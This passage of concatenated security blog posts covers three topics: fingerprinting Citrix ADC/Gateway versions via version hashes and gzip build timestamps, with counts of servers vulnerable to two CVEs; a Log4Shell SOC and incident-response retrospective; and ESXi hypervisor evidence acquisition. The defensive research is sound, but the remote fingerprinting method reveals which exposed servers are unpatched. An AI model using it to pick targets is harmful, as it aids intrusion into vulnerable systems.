/var/netscaler/gui/vpn/tmlogout.html
/var/netscaler/gui/vpns/choices.html
/var/netscaler/gui/vpns/f_ndisagent.html
/var/netscaler/gui/vpns/f_services1.html
/var/netscaler/gui/vpns/f_services_linux.html
/var/netscaler/gui/vpns/j_services.html
/var/netscaler/gui/vpns/m_services.html
/var/netscaler/gui/vpns/navui/refresh.html
/var/netscaler/gui/vpns/nohomepage.html
/var/netscaler/gui/vpns/postepa.html

When installing the application from the Google Cloud Marketplace, it does not give the option to choose a version to install. But of course, we want to install other versions to start building a list of known version hashes.

We noticed that a deployment.zip file can be downloaded from the Google Cloud Marketplace:

deployment.zip can be downloaded

After unpacking deployment.zip we see that this contains Terraform scripts to deploy the cloud application and references the disk image it uses for installation. Luckily, Citrix also left a list in a Jinja template of other disk image names referencing different Citrix ADC versions.

cloud image names of other Citrix ADC versions in a Jinja template

Can these disk images be downloaded? Yes, it turns out you can!

Acquiring Cloud images

We used the following gcloud commands to download Citrix ADC disk images:

  • gcloud compute images create, to download the image in our own Google Cloud project. This allows you to choose this image when you create a new VM. However, this does not make the image directly accessible for reading using other tools, for that we need to export it first.
  • gcloud compute images export, this exports the given image to a Google Cloud Storage (GCS) bucket using a different format such as qcow2 or vmdk.

The raw disk image is 20 GB but exporting it as qcow2 format we can reduce this to only 2 GB.

The following shell script does both steps in one script:

#!/bin/sh
#
# Export a Citrix ADC image to a Google Cloud Storage bucket
#
# Usage:
#   ./export-citrix-image.sh <image name> <bucket_path>
# Example:
#   ./export-citrix-image.sh citrix-adc-vpx-10-standard-13-0-85-19 gs://my-bucket
image="$1"
gcs_bucket="$2"

gcloud compute images create "$image" --source-image https://www.googleapis.com/compute/v1/projects/citrix-master-project/global/images/$image --verbosity debug
gcloud compute images export --destination-uri "$gcs_bucket/$image.qcow2"  --image "$image" --export-format qcow2

Now that we exported some known images from deployment.zip to a GCS bucket, we can process them in bulk. Of course, having them archived and preserved can also be helpful for future research, especially for vulnerable versions, as they tend to get deleted.

This technique can also be used for other appliances in the Google Cloud Marketplace.

Dissect to the rescue!

What better way to process disk images in bulk than dogfooding our own opensource dissect framework. While Citrix ADC runs on FreeBSD, dissect can read its UFS/FFS file systems just fine. After we fixed a few bugs that is.

We can also do everything in a Cloud Shell, without spinning up an extra VM.

Let’s mount our GCS bucket containing the qcow2 images first using gcsfuse:

yun@cloudshell:~ (rift-citrix-362712)$ mkdir bucket

yun@cloudshell:~ (rift-citrix-362712)$ gcsfuse my-citrix-adc-bucket bucket
2022/12/11 15:48:25.442402 Start gcsfuse/0.41.9 (Go version go1.18.4) for app "" using mount point: /home/yun/bucket
2022/12/11 15:48:25.462744 Opening GCS connection...
2022/12/11 15:48:25.557883 Mounting file system "my-citrix-adc-bucket"...
2022/12/11 15:48:25.563799 File system has been successfully mounted.

yun@cloudshell:~ (rift-citrix-362712)$ ls -1 bucket/citrix*.qcow2
citrix-adc-vpx-10-standard-13-0-83-27.qcow2
citrix-adc-vpx-10-standard-13-0-87-9.qcow2
citrix-adc-vpx-10-standard-13-0-88-14.qcow2
citrix-adc-vpx-10-standard-13-1-21-50.qcow2
citrix-adc-vpx-10-standard-13-1-33-52.qcow2
citrix-adc-vpx-byol-13-0-76-31.qcow2
citrix-adc-vpx-byol-13-0-79-64.qcow2
citrix-adc-vpx-byol-13-0-82-45.qcow2
citrix-adc-vpx-byol-13-0-88-16.qcow2
citrix-adc-vpx-byol-13-1-33-49.qcow2
citrix-adc-vpx-byol-13-1-33-52.qcow2
citrix-adc-vpx-byol-13-1-33-54.qcow2
citrix-adc-vpx-byol-13-1-37-38.qcow2
citrix-adc-vpx-express-13-0-83-29.qcow2
...

Now we install the latest version of dissect using pip3 in a virtualenv:

yun@cloudshell:~ (rift-citrix-362712)$ python3 -mvenv dissect

yun@cloudshell:~ (rift-citrix-362712)$ source dissect/bin/activate
(dissect) yun@cloudshell:~ (rift-citrix-362712)$ pip3 install --pre dissect

Dissect will install different command line tools. One of these tools is called target-shell, which can read disk images and file systems in various formats and gives you a shell-like interface to explore the file system.

Now let’s open a disk image using target-shell, we specify the -q flag to hide some warnings:

target-shell in a Cloud Shell


Dissect does not (yet!) support Citrix ADC, so instead it gives us access to the discovered filesystems. We see two partitions, and we found the first one is the /boot partition and second one is the /var partition. target-shell has a basic find command, but the output can be piped to an external tool such as grep:

citrix-adc-vpx-10-standard-13-0-83-27.qcow2 /> cd fs1

citrix-adc-vpx-10-standard-13-0-83-27.qcow2 /fs1> find . | grep index.html
/fs1/netscaler/gui/vpn/index.html
/fs1/netscaler/gui/vpn/tmindex.html
/fs1/netscaler/gui/admin_ui/gui_v2/swagger_ui/index.html
^C

Let’s cat the first index.html file (grep is used to limit the output for this example):

citrix-adc-vpx-10-standard-13-0-83-27.qcow2 /fs1> cat /fs1/netscaler/gui/vpn/index.html | grep ?v= | head -n1
<link href="/vpn/js/rdx/core/css/rdx.css?v=c9e95a96410b8f8d4bde6fa31278900f" rel="stylesheet" type="text/css"/>
citrix-adc-vpx-10-standard-13-0-83-27.qcow2 /fs1>

Nice, we find that for version 13.0-83-27 the version hash is c9e95a96410b8f8d4bde6fa31278900f.

Not everyone realizes this, but with just this one command, we loaded a FreeBSD image in qcow2 disk format containing multiple UFS/FFS2 partitions by using Python and dissect in a Cloud Shell. No hassle of installing additional tools and performing tedious steps to mount images. The future is now!

To even further automate this we can use the dissect Python API or we can make a simple shell oneliner using target-fs, which can execute some basic commands against a disk image:

target-fs oneliner

It’s good to mention that at this point, we also started to investigate if the version hash can be calculated by MD5 summing variants of the version string, but without any luck.

Identifying the build date

After processing our acquired cloud images, we found that we still had version hashes from the internet without a known version, so it seemed that not all versions were listed or available as a cloud image. We did manage to acquire some cloud images by guessing the image name, but this was not enough to fill in the gaps.

We finally resorted to the Citrix downloads page to look for other versions we didn’t have yet. A Citrix account is required but it’s open for registration. However, it seemed that not every version that was released is listed on the Citrix downloads page, especially older builds that were replaced by a new build. We found a GitHub project that scraped Citrix download links that were useful for our research, and we found that these links are still valid (after logging in).

While our known version list kept growing, we still missed certain hashes that were quite common in the dataset. We naturally wanted to know which version that was, and at this point, we found an interesting way to determine the approximate build date of the Citrix ADC server version.

In the disk image we found the gzip-compressed file named rdx_en.json.gz under the vpn subdirectory:

citrix-adc-vpx-10-standard-13-0-83-27.qcow2 /fs1> find . | grep rdx_en.json.gz
/fs1/netscaler/gui/vpn/js/rdx/core/lang/rdx_en.json.gz
/fs1/netscaler/gui/admin_ui/rdx/core/lang/rdx_en.json.gz
^C

citrix-adc-vpx-10-standard-13-0-83-27.qcow2 /> ls -la /fs1/netscaler/gui/vpn/js/rdx/core/lang | grep rdx_en
-rw-r--r-- 1001  513     35 2021-09-27T14:01:20 rdx_en.json.gz

Let’s run the file command on this gzip file:

citrix-adc-vpx-10-standard-13-0-83-27.qcow2 /fs1> file /fs1/netscaler/gui/vpn/js/rdx/core/lang/rdx_en.json.gz
/fs1/netscaler/gui/vpn/js/rdx/core/lang/rdx_en.json.gz: gzip compressed data, was "rdx_en.json", last modified: Mon Sep 27 14:01:20 2021, from Unix

Last modified Mon Sep 27 14:01:20 2021. Cool, we retrieve the timestamp of when this gzip file was created and we found that this timestamp is an accurate depiction of when the version was created/released, pretty neat! This JSON file seems to be used for translations purposes, but in newer versions this file is just an empty gzipped JSON dictionary.

Because this rdx_en.json.gz file resides in the vpn sub-directory, it can also be downloaded remotely by accessing the following URI /vpn/js/rdx/core/lang/rdx_en.json.gz

We now have a list of version hashes, known versions, and approximate build dates. Using the build dates we can now deduce the approximate version of a version hash that we don’t know the version of yet.

For example, the version hash 4434db1ec24dd90750ea176f8eab213c was still missing its version number, and we already processed all the cloud images and available download links from the Citrix download page. But armed with the knowledge of the build date 2022-06-29 13:46:08 of this version hash, we can deduce that this build date falls between the build dates of the known versions 12.1-65.15 and 12.1-65.25. Table for clarity:

build dateversion hashversion
2022-05-22 19:18:31fbdc5fbaed59f858aad0a870ac4a779c12.1-65.15
2022-06-29 13:46:084434db1ec24dd90750ea176f8eab213c??
2022-10-04 16:11:03f063b04477adc652c6dd502ac0c39a7512.1-65.25
Ordering version hashes by to their approximate build dates can help determine missing versions

Ok, the possible versions can be: 12.1-65.16 to 12.1-65.24.

These versions are not listed on the download page but does a version within this range exist and can it still be downloaded? By looking at the Citrix download links of known versions we see that the Download ID looks to be incremental, and that the files have a specific format. For example:

URL format example: https://downloads.citrix.com/[DOWNLOAD_ID]/build-[VERSION]_nc_64.tgz

https://downloads.citrix.com/20651/build-12.1-65.15_nc_64.tgz <-- known url
https://downloads.citrix.com/20???/build-12.1-65.??_nc_64.tgz <-- enumerate this url
https://downloads.citrix.com/21408/build-12.1-65.25_nc_64.tgz <-- known url

Can we enumerate the URL and then download the file? The answer is yes, by using a small Python script to enumerate the download link and version, we find that the following URL returns a 200 OK:

https://downloads.citrix.com/20929/build-12.1-65.17_nc_64.tgz

After downloading build-12.1-65.17_nc_64.tgz, we confirmed that version 12.1-65.17 maps to the version hash 4434db1ec24dd90750ea176f8eab213c. This technique proved to be very useful for filling in most of the gaps in versions in our dataset, with a few missing.

Our compiled list of version hashes, approximate build dates, and versions can be found in this gist: https://gist.github.com/fox-srt/c7eb3cbc6b4bf9bb5a874fa208277e86

List of approximate build date, version hash and version.

Version statistics

Now that we have mapped most of the known version hashes to a version, we can measure how many versions there are active on the internet, and if they are still vulnerable to CVE-2022-27510 or CVE-2022-27518.

The following graph shows the Top 20 active versions on the internet, and also shows if that version is vulnerable to any of the two recent CVEs:

Top 20 Citrix ADC / Gateway versions on the Internet

We see that the majority is on version 13.0-88.14, which is not vulnerable to either of the two CVEs. The runner up is version 12.1-65.21 which is not vulnerable to CVE-2022-27510, but it is to CVE-2022-27518. There are also many servers that do not return a version hash at all so for those servers we cannot identify the exact version.

Note that for CVE-2022-27518 a pre-condition of SAML is required for it to be exploitable, so knowing only the version does not fully indicate if the server can be exploited but it’s still a good indicator that it should be updated.

The following graph shows the Top 9 countries using Citrix ADC / Gateway and how many servers are still vulnerable to the two critical CVEs. For most countries we see an obvious drop of servers vulnerable to CVE-2022-27518 after the NSA and new Citrix advisory publication.

Top 9 countries using Citrix ADC with vulnerability statistics for latest two CVEs

This graph shows the Top 20 countries using Citrix ADC / Gateway and how many servers are properly updated so they are protected against both CVEs.

How many servers by country are fully updated against the latest two CVEs

Conclusion

In this blog, we’ve shown how we performed the version identification of Citrix ADC and Citrix Gateway servers by analysing disk images exported from Google Cloud Marketplace using dissect. We also demonstrated that gzip files can be helpful for timestamp information and how we utilised this to find and download missing Citrix ADC builds.

Finally, we used the version identification data to measure the versions of internet-facing Citrix ADC and Gateway servers over time and see that the NSA and Citrix advisory really helped with updates. However, some servers remain vulnerable to CVE-2022-27510 or CVE-2022-27518.

We hope this blog creates extra awareness for these two Citrix CVEs and that our research on version identification contributes to future studies.

One Year Since Log4Shell: Lessons Learned for the next ‘code red’

Authored by Edwin van Vliet and Max Groot

One year ago, Fox-IT and NCC Group released their blogpost detailing findings on detecting & responding to exploitation of CVE-2021-44228, better known as ‘Log4Shell’. Log4Shell was a textbook example of a code red scenario: exploitation was trivial, the software was widely used in all sorts of applications accessible from the internet, patches were not yet available and successful exploitation would result in remote code execution. To make matters worse, advisories heavily differed in the early hours of the incident, resulting in conflicting information about which products were affected.

Due to the high-profile nature of Log4Shell, the vulnerability quickly drew the attention of both attackers and defenders. This wasn’t the first time such a ‘perfect storm’ has taken place, and it will definitely not be the last one. This 1-year anniversary seems like an appropriate time to look back and reflect on what we did right and what we could do better next time.

Reflection firstly requires us to critically look at ourselves. Thus, in the first part of this blog we will look back at how our own Security Operations Center (SOC) tackled the problem in the initial days of the ‘code red’. What challenges did we face, what solutions worked, and what lessons will we apply for the next code red scenario?

The second part of this blog discusses the remainder of the year. Our CIRT has since been contacted by several organizations that were exploited using Log4Shell. Such cases ranged from mere coinminers to domain-wide ransomware, but there were several denominators between those cases that provide insight in how even a high-profile vulnerability such as Log4Shell can go by unnoticed and result in a compromise further down the line.

SOC perspective: From quick wins to long term solutions

Within our SOC we are tasked with detecting attacks and informing monitored customers with actionable information in a timely manner. We do not want to call them for generic internet noise, and they expect us to only call when a response on their end is necessary. We have a role that is restricted to monitoring: we do not segment, we do not block, and we do not patch. During the Log4Shell incident, our primary objective was to keep our customers secure by identifying compromised systems quickly and effectively.

The table below summarizes the most important actions we undertook in response to the emergency of the Log4Shell vulnerability. We will reflect further on these events to discuss why we took certain decisions, as well as consider what we could have done differently and what we did right.

Estimated Time (UTC) Event
2021-12-09 22:00 (+0H)Proof-of-Concept for Log4Shell exploitation was published on Github
2021-12-10 08:00 (+10H)Push experimental Suricata rule to detect exploitation attempts
2021-12-10 12:30 (+14,5H)Finish tool that harvests IOC’s out of detected exploitation attempts, start hunting across all platforms
2021-12-10 15:00 (+17H)Behavior-based detection picks up first successful hack using Log4Shell
2021-12-10 21:00 (+23H)Transition from improvised IOC hunting to emergency hunting shifts
2021-12-11 10:00 (+36H)Report first incidents based on hunting to customers
2021-12-12 16:00 (+42H)Send advisory, status update and IOCs to SOC customers
2021-12-12 17:00 (+43H)Add Suricata rule to testing that can distinguish between failed and successful exploitation in real-time
2021-12-13 08:00 (+58H)Determine that real-time detection works, move to production
2021-12-13 08:10 (+58H)Decide to publish all detection & IOC’s as soon as possible
2021-12-13 14:00 (+62H)Refactor IOC harvesting tool to keep up with exploitation volume
2021-12-13 14:30 (+62,5H)Another successful hack found using hunting procedure
2021-12-13 19:30 (+67,5H)Publish all detection and IOC’s in Log4Shell blog
2021-12-13 21:00 (+69h)End emergency hunting procedure
2021-12-14 06:30 (+80,5H)Successful hack detected using Suricata rule
Overview of most important event and actions for the Fox-IT SOC when responding to the emergence of Log4Shell

Friday (2021-12-10): Get visibility and grab the quick wins

On Thursday evening, a proof-of-concept was published on GitHub that made it trivial for attackers to exploit Log4Shell. As we became aware of this on Friday morning, our first point of attention was getting visibility. As we monitor networks with significant exposure to the internet, we anticipated that exploitation attempts would be coming quickly and in vast volumes. One of the first things we did was add detection for exploitation attempts. While we knew that we cannot manually investigate every exploitation attempt, detecting them in the first place would allow us to have a starting point for a threat hunt, add context to other alerts, and give us an idea how this vulnerability is being exploited in the wild. Of course, methods of gaining visibility differ for every SOC and even per threat scenario, but if you can deploy measures to increase visibility, these will often help you out for the remainder of your response process.

While we would have preferred to have full detection coverage immediately, that is often not realistic. We hoped that by detecting exploitation attempts, we would be pointed in the right direction for finding additional detection opportunities.

For the Log4Shell vulnerability, there was an additional benefit. Exploitation of Log4Shell is a multi-step process, where upon successful exploitation of the vulnerability the vulnerable Log4J package will reach out to an attacker-controlled server to retrieve the second-stage payload. This multi-step exploitation process is to the advantage of defenders: initial exploitation attempts will contain the location of the attacker-controlled server that hosts the second-stage payload. This made it possible to automatically retrieve and process the exploitation attempts that were detected. This could then be used to generate a list of high-confidence Indicators of Compromise (IOCs). After all, a connection to a server hosting a second-stage payload could be a strong indicator that a successful exploitation had occurred.

We started regularly mining these IOCs and using them as input for emergency threat hunting. Initially this hunting process was a bit freeform, but we quickly realized we would be doing multiple of such emergency threat hunts for the coming days. We initiated a procedure to perform emergency hunting shifts leveraging our SOC analysts on-duty to perform IOC checks and hunting the networks of customers where these IOCs were found.

We were aware that this ‘emergency threat hunting’ approach was not failproof, for a multitude of reasons:

  • We had to detect the exploitation attempt correctly to mine the corresponding IOC.
  • Hunting for these IOCs still requires manual investigation and threat hunting and is thus prone to human errors.
  • Lastly, searching for connections to IOC’s is a form of retroactive investigation: it does not allow defenders to identify a compromise in real-time.

It was clear that this approach wouldn’t last us all weekend. However, this procedure allowed us the much-needed time to dive deeper into the vulnerability and investigate how to detect it ‘on the wire.’ Mining IOCs was the ‘quick win’ solution that worked for us, but this might be different for others. The importance of quick wins should not be underestimated: quick wins help to buy you some time while you move to solutions that are suited for the long term.

Saturday (2021-12-11): Determine & work towards the short-term objective

Saturday was a day for experimentation: we knew that what we really wanted was to be able to distinguish unsuccessful exploitation attempts from successful ones in real time. At this point, the whole internet was regularly being scanned for Log4Shell, and the alerts were flooding in. It was impossible to manually investigate every exploitation attempt. Real time distinction between a failed and a successful exploitation attempt would allow us to respond quickly to incoming threats. Moreover, it would also allow us to phase out the emergency hunting shifts, that were placing a heavy burden on our SOC analysts.

While we were researching the vulnerability, we got an alert about a suspicious download occurring in a customer network. The alert that had triggered was based on a generic rule that monitors for suspicious downloads from rare domains. This download turned out to be post-exploitation activity following remote code execution that had been obtained using Log4Shell. The compromised system hadn’t come up yet in our threat hunting process, but the post-exploitation activity had been detected using our ruleset for generic malicious activity. While signatures for vulnerability exploitation are of great value, they work best in conjunction with detection for generic suspicious activity. In a code red scenario, many attackers will likely fall back on tooling and infrastructure they have used prior. Thus, for code reds, having generic detection in place is crucial to ‘fill the gaps’ while you are working on tightening your defenses.

Researching how to detect the vulnerability ‘over the wire’ took time and resources. We had reproduced the exploit in our local lab and combined with the PCAP from the observed ‘in the wild’ hack, we had what we needed to work on detection that could distinguish successful from failed exploitation attempts.

Halfway through Saturday, we pushed an experimental Suricata rule that appeared promising. This rule could detect the network traffic that Log4J generates when reaching out to attacker-controlled infrastructure. Therefore, the rule should only trigger on successful exploitation attempts, and not on failed ones. While this worked great in testing, it takes some time to know for sure whether this detection will hold up in production. At that point, the waiting game began. Will this detection yield false positives? Will it trigger when it needs to?

Something we should have done better at this stage of the ‘code red’ is inform our customers what we had been doing. When it comes to sending advisories to our customers, we often find ourselves conflicted. Our rule of thumb is that we only send an advisory when we feel that we have something meaningful to add that our customers do not know yet. Thus, we had not sent a ‘patch everything as soon as possible’ advisory to our customers, as this felt redundant. Having said that, sending something of an update at an earlier stage about what we had been doing would have been better for our customers.

On Saturday evening, more than 36 hours after we had started collecting IOC’s & threat hunting, we informed our customers about what we had been doing up until that point. We provided IOCs and explained what we had done in terms of detection. We referred to advisories & repositories made by others when it came to patching & mitigation. In hindsight, we should have an update earlier about where we would focus our efforts. Giving an update earlier would have allowed customers to focus their efforts elsewhere, knowing what part of the responsibility we would take up during the code red. After all, proactively informing those that depend on you for their own defense, greatly reduces the amount of redundant work that is being done across the line.

Sunday (2021-12-12): Transition to the long-term

On Sunday, we had our detection of real-time exploitation working. We knew that it worked as it had triggered several times on systems that had been targeted with Log4Shell exploitation attempts. These systems were segmented in a way where they could not set up connections to external servers, preventing them from successfully retrieving the second-stage payload. However, these systems were still highly vulnerable and exposed and thus we reported such instances as soon as we could.

On Sunday morning, the Dutch National Cyber Security Center (NCSC-NL) assembled all companies part of ‘Cyberveilig Nederland,’ an initiative that Fox-IT participates in. NCSC-NL had set up a repository where cybersecurity companies could document information on this vulnerability, including the identification of software that could be exploited.

This central repository made it a lot easier for us to share our work in a way where we knew others could easily find it within the larger context of the Log4Shell incident. Such a ‘central repository’ allows organizations such as ourselves to focus on the things they are good at. We are not specialized in patching but know a thing or two about writing detection and responding to identified compromise. Collaboration is key during a code red. Organizations should contribute based on their own specialties so that redundant work can be avoided.

At the start of the day, we had unanimously agreed to publish all our detection as soon as possible, preferably that same day. This was when we started writing our blog. One complication was that we were more than 60 hours underway, and fatigue was kicking in. This was also the time to ‘bring in the reinforcements’ and ask others to review our work. IOCs were double-checked, and tools that had been quickly scrapped together were refactored to keep up with the volume of alerts. We released the blogpost at about 8PM, a little later than we had aimed for. With the release of our blogpost, we could share all knowledge we had acquired over the weekend with the security community. We chose to focus on what we know best: network detection and post-exploitation detection. With real-time detection in place, we had our first response done. Over the following weeks, we would continue to work on detecting exploitation, as well as do additional research such as identifying varying payloads used in the wild and releasing the log4-jfinder.

As a summary, the below timeline highlights the key events in our first 72 hours responding to Log4Shell. All blue events are related to detection engineering, whereas green & red identify key moments in decision-making. You can click on the timeline for an enlarged view.

While the high-profile nature of the Log4Shell vulnerability alerted almost everyone that action had to be taken initially, Log4Shell turned out to be a vulnerability with a ‘long tail’. In the year that followed, off-the-shelf exploits would become available for several products, and some mitigations that were released initially turned out to be insufficient for the long run. The next section will therefore approach Log4Shell from the incident response perspective: what did we find when we were approached by organizations that had had trouble mitigating?

Incident Response Retrospective

In the past year, we responded to several incidents where the Log4Shell vulnerability was part of the root cause. In this retrospective we will compare those incidents to the expectations that we had in the security industry. We were expecting many ransomware incidents resulting from this initial attack vector. Was this expectation grounded?

The incident response cases we investigated can largely be divided into four categories. It should be noted that often times, multiple distinct threat actors had left their traces on the victim’s systems. It was not uncommon that we were able to identify activities in multiple of the following categories on the same system:

  • Ransomware. Either systems were already encrypted, or sufficient information was identified to conclude the actor was intending to deploy ransomware.
  • Coin miners. These were mostly fully automated attacks. The miners were often encountered as secondary compromises without any apparent connection to other compromises.
  • Espionage. Several cases were related to the Deep Panda actor, according to indicators mentioned by Fortinet. In several cases we identified activities what were concentrated on 5 February 2022. This indicates a short, widespread campaign by this actor. Most of the cases showed only partial signs of the chain though.
  • Initial stage only. Successful exploitation of the Log4Shell vulnerabilities, but no significant post-compromise activities. The attackers may have been hindered by network segmentation or by a big backlog of other victims. As a result, we cannot confidently put such an attacker in any of the other categories.

We compared the various recommendations that we provided in these incident response cases. All the incidents that led to an engagement of our incident response teams could have been prevented if:

  • The vulnerable systems had been updated in time.
    In every instance, a security advisory was released by the vendor of the product containing the Log4Shell vulnerability. And in every case, a security update was available at the time of compromise.
  • The system had been in a segmented network, blocking arbitrary outgoing connections.
    In most situations, the vulnerable system or appliance needed access only to specific services and therefore did not require access to any external resource.

As always, reality is a little more nuanced. We will elaborate a bit in the following two sections.

Unfortunate series of events

In follow-up conversations with organizations that contacted our CIRT, we noticed a pattern that many of them had heard of Log4Shell but believed they were safe. The most common reason for their false sense of safety is a very unfortunate series of events related to patch and lifecycle management.

For example, one vendor had released both a security update and a mitigation script, the latter being for organizations that were not able to immediately apply the security update. On several incident response engagements, we found administrators who had executed the script and thought they were safe, unaware that the vendor had later released new versions of the mitigation script. The first version of the mitigation script apparently did not completely resolve the problem. The newer mitigation scripts performed many more operations that were required to protect against Log4Shell, including for example modifying the Log4J jar-file. As a result of this, several victims were not aware they were still running vulnerable software.

We also encountered incidents where administrators kept delaying the security upgrades or performed the upgrade but had to roll back to a snapshot due to technical issues after the upgrade. The rollback restored the old situation in which the software was still vulnerable.

The lesson here is that clear communication from vendors about vulnerabilities and mitigation is key. For end users, a mitigation script or action is almost always less preferable than applying the security update. Mitigation scripts should be considered to be quick wins, not long-term solutions.

Destination unreachable

The other major mitigation that could have prevented several incidents was network segmentation. Exploitation of this type of vulnerability requires outbound network connections to download a secondary payload. Therefore, in a network segment where connections are heavily regulated, this attack simply would not work.

In server networks, a firewall should typically block all connections by default. Only some connections should be allowed, based on source and/or destination addresses and ports. Of course, in this modern world, cloud computing often requires larger blocks of IP space to be allowed. The usual solution is to configure proxy servers that allow downloading security updates or connecting to cloud services based on domain names.

In a few cases, the initial attempts by malicious actors were unsuccessful, because the outgoing connections were blocked or hindered by the customer’s network infrastructure. However, with later “improvements” some attackers managed to bypass some of the mechanisms (for example, hosting the payload on the often allow-listed port 443), or they found vulnerable services on non-standard ports. Those cases prove it was a race against the clock, because attackers were also improving their techniques.

Besides actively blocking outgoing connections, the firewalls offer insight due to the log entries they emit. Together with network monitoring they can immediately single out vulnerable devices. And possibly the biggest advantage of strict network segmentation: they counter zero-days of this entire category of vulnerabilities. A zero-day is not necessarily something that is only used by advanced attackers. Some software that is widely in use today will contain vulnerabilities that nobody knows about yet. If such a vulnerability is discovered by a malicious actor, an exploit may be available before a security update. That is one of the main reasons why we should value strict network segmentation: it provides an additional layer of defense.

Closing Remarks

Looking back, we have dealt with far fewer incidents than we had initially expected. Does this mean that we were overly pessimistic? Or does it mean that our “campaign” as a security industry was very effective? We like to believe the latter. After all, almost everybody who needed to know about the problem knew about it.

Having said that, one risk we are all taking is the risk of numbing our audience. We need to be conservative sending out ‘code red’ security advisories to prevent the “boy who cried wolf” syndrome. Nowadays it sometimes seems like the security industry does not take their end users seriously enough to believe that they will act on vulnerabilities that do not have a catchy name and logo.

In this case, we as a security community gave Log4Shell a lot of attention. We think this was justified. The vulnerability was easy to exploit with PoC code available, and the Log4J component was used in many software products. Moreover, we saw widespread exploitation in the wild, albeit mostly using off-the-shelf exploits for products that use Log4J.

Our role within the security industry comes with the responsibility to inform. With a component as widespread as Log4J, it is very difficult to provide specific advice. It’s the software vendors whose software uses these components who need to provide more specific security advisories. Their advisories need to be actionable. We think that for the general public, it is best to closely follow those specific advisories for products they might be using.

As security vendors, repeating information that is already available can only lead to confusion. Instead, we should contribute within our own areas of expertise. For the next code red, we know what we’ll do: focus our efforts where we have something to add, and stay out of areas where we do not. Bring it on!

I’m in your hypervisor, collecting your evidence

Authored by Erik Schamper

Data acquisition during incident response engagements is always a big exercise, both for us and our clients. It’s rarely smooth sailing, and we usually encounter a hiccup or two. Fox-IT’s approach to enterprise scale incident response for the past few years has been to collect small forensic artefact packages using our internal data collection utility, “acquire”, usually deployed using the clients’ preferred method of software deployment. While this method works fine in most cases, we often encounter scenarios where deploying our software is tricky or downright impossible. For example, the client may not have appropriate software deployment methods or has fallen victim to ransomware, leaving the infrastructure in a state where mass software deployment has become impossible.

Many businesses have moved to the cloud, but most of our clients still have an on-premises infrastructure, usually in the form of virtual environments. The entire on-premises infrastructure might be running on a handful of physical machines, yet still restricted by the software deployment methods available within the virtual network. It feels like that should be easier, right? The entire infrastructure is running on one or two physical machines, can’t we just collect data straight from there?

Turns out we can.

Setting the stage

Most of our clients who run virtualized environments use either VMware ESXi or Microsoft Hyper-V, with a slight bias towards ESXi. Hyper-V was considered the “easy” one between these two, so let’s first focus our attention towards ESXi.

VMware ESXi is one of the more popular virtualization platforms. Without going into too much premature detail on how everything works, it’s important to know that there are two primary components that make up an ESXi configuration: the hypervisor that runs virtual machines, and the datastore that stores all the files for virtual machines, like virtual disks. These datastores can be local storage or, more commonly, some form of network attached storage. ESXi datastores use VMware’s proprietary VMFS filesystem.

There are several challenges that we need to overcome to make this possible. What those challenges are depends on which concessions we’re willing to make with regards to ease of use and flexibility. I’m not one to back down from a challenge and not one to take unnecessary shortcuts that may come back to haunt me. Am I making this unnecessarily hard for myself? Perhaps. Will it pay off? Definitely.

The end goal is obvious, we want to be able to perform data acquisition on ideally live running virtual machines. Our internal data collection utility, “Acquire”, will play a key part in this. Acquire itself isn’t anything special, really. It builds on top of the Dissect framework, which is where all its power and flexibility comes from. Acquire itself is really nothing more than a small script that utilizes Dissect to read some files from a target and write it to someplace else. Ideally, we can utilize all this same tooling at the end of this.

The first attempts

So why not just run Acquire on the virtual machine files from an ESXi shell? Unfortunately, ESXi locks access to all virtual machine files while that virtual machine is running. You’d have to create full clones of every virtual machine you’d want to acquire, which takes up a lot of time and resources. This may be fine in small environments but becomes troublesome in environments with thousands of virtual machines or limited storage. We need some sort of offline access to these files.

We’ve already successfully done this in the past. However, those times took considerably more effort, time and resources and had their own set of issues. We would take a separate physical machine or virtual machine that was directly connected to the SAN where the ESXi datastores are located. We’d then use the open-source vmfs-tools or vmfs6-tools to gain access to the files on these datastores. Using this method, we’re bypassing any file locks that ESXi or VMFS may impose on us, and we can run acquire on the virtual disks without any issues.

Well, almost without any issues. Unfortunately, vmfs-tools and vmfs6-tools aren’t exactly proper VMFS implementations and routinely cause errors or data corruption. Any incident responder using vmfs-tools and vmfs6-tools will run into those issues sooner or later and will have to find a way to deal with them in the context of their investigation. This method also requires a lot of manual effort, resources and coordination. Far from an ideal “fire and forget” data collection solution.

Next steps

We know that acquiring data directly from the datastore is possible, it’s just that our methods of accessing these datastores is very cumbersome. Can’t we somehow do all of this directly from an ESXi shell?

When using local or iSCSI network storage, ESXi also exposes the block devices of those datastores. While ESXi may put a lock on the files on a datastore, we can still read the on-device filesystem data just fine through these block devices. You can also run arbitrary executables on ESXi through its shell (except when using the execInstalledOnly configuration, or can you…? 😉), so this opens some possibilities to run acquisition software directly from the hypervisor.

Remember I said I liked a challenge? So far, everything has been relatively straightforward. We can just incorporate vmfs-tools into acquire and call it a day. Acquire and Dissect are pure Python, though, and incorporating some C library could overcomplicate things. We also mentioned the data corruption in vmfs-tools, which is something we ideally avoid. So what’s the next logical step? If you guessed “do it yourself” you are correct!

You got something to prove?

While vmfs-tools works for the most part, it lacks a lot of “correctness” with regards to the implementation. Much respect to anyone who has worked on these tools over the years, but it leaves a lot on the table as far as a reference implementation goes. For our purposes we have some higher requirements on the correctness of a filesystem implementation, so it’s worth spending some time working on one ourselves.

As part of an upcoming engagement, there just so happened to be some time available to work on this project. I open my trusty IDA Pro and get to work reverse engineering VMFS. I use vmfs-tools as a reference to get an idea of the structure of the filesystem, while reverse engineering everything else completely from scratch.

Simultaneously I work on reconstructing an ESXi system from its “offline” state. With Dissect, our preferred approach is to always work from the cleanest slate possible, even when dealing with a live system . For ESXi, this means that we don’t utilize anything from the “live” system, but instead will reconstruct this “live” state within Dissect ourselves from however ESXi stores its files when it’s turned off. This can cause an initial higher effort but pays of in the end because we can then interface with ESXi in any possible way with the same codebase: live by reading the block devices, or offline from reading a disk image.

This also brought its own set of implementation and reverse engineering challenges, which include:

  • Writing a FAT16 implementation, which ESXi uses for its bootbank filesystem.
  • Writing a vmtar implementation, a slightly customized tar file that is used for storing OS files (akin to VIBs).
  • Writing an Envelope implementation, a file encryption format that is used to encrypt system configuration on supported systems.
  • Figuring out how ESXi mounts and symlinks its “live” filesystem together.
  • Writing parsers for the various configuration file formats within ESXi.

After two weeks it’s time for the first trial run for this engagement. There are some initial missed edge cases, but a few quick iterations later and we’ve just performed our first live evidence acquisition through the hypervisor!

A short excursion to Hyper-V

